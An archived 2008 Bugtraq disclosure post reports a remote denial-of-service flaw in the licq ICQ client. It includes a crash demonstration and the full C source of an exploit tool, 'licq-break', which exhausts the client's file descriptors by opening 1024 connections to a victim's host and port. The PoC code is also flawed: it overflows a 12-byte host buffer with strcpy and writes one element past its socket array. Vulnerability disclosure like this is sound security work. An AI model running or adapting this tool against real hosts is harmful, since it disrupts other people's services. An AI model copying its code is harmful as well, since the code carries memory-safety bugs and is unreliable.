lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <1207660377.5403.43.camel@gat3way.globul.bg>
Date: Tue, 08 Apr 2008 16:12:56 +0300
From: Milen Rangelov <mrangelov@...bul.bg>
To: bugtraq@...urityfocus.com
Subject: licq remote DoS?

Hello, 

Licq is a linux qt-based ICQ client. There is a vulnerability in the way
licq processes new incoming TCP connections which can be exploited by a
remote attacker to crash the client.

When executed, licq opens a listening socket at a random port (AFAIK
between 30000 and 65000). There is no host-based authentication and any
remote host can connect to it. Those connections are not closed by licq
after a given timeout period.

When all possible open file descriptors are exhausted (they are limited
to 1024 for non-root users in most linux installations /ulimit -n/), a
new incoming TCP connection causes licq to crash.

Here is some example:

We run licq:
gat3way@...3way:~$ licq

from another console, we find out the port licq is listening to (we'd
need to portscan if the target is on a remote system):

gat3way@...3way:/tmp$ lsof |grep licq|grep LISTEN
licq      10783    gat3way    9u     IPv4   35993218                TCP
*:52259 (LISTEN)

Now we run our "evil" denial of service code:
gat3way@...3way:/tmp$ ./licq-break 127.0.0.1 52259
ip=127.0.0.1
done!

and go back to the console on which we ran licq...oops..

Licq Segmentation Violation Detected.
Backtrace (saved in /home/gat3way/.licq//licq.backtrace):
licq(licq_handle_sigabrt+0x2b4) [0x80f68d4]
[0xffffe420]
/lib/libc.so.6(abort+0x101) [0xb7b17811]
licq [0x80f6b1d]
[0xffffe420]
licq(_Z18MonitorSockets_tepPv+0x3ca) [0x80c907a]
/lib/libpthread.so.0 [0xb7d9e383]
/lib/libc.so.6(clone+0x5e) [0xb7bc173e]
Attempting to generate core file.
....


The source of licq-break (nothing particular, just connects MAX sockets
to a certain port at the victim's host):
-------------------------

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

// change to suit your needs
#define MAX 1024

int fds[MAX];

int main(int argc, char *argv[])
{
    int port,a;
    char host[12];
    struct sockaddr_in victim;
    struct in_addr inp;

    if (argc!=3)
    {
        printf("usage: %s <ip> <port>\n",argv[0]);
        exit(1);
    }

    port=atoi(argv[2]);
    strcpy(host,argv[1]);
    printf("ip=%s\n",host);

    for (a=1;a<=MAX;a++)
    {
        fds[a]=socket(PF_INET,SOCK_STREAM,0);
        victim.sin_family= AF_INET;
        victim.sin_port=htons(port);
        inet_aton(host,&victim.sin_addr);
        connect(fds[a],&victim,sizeof(victim));
    }

    printf("done!");

}




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ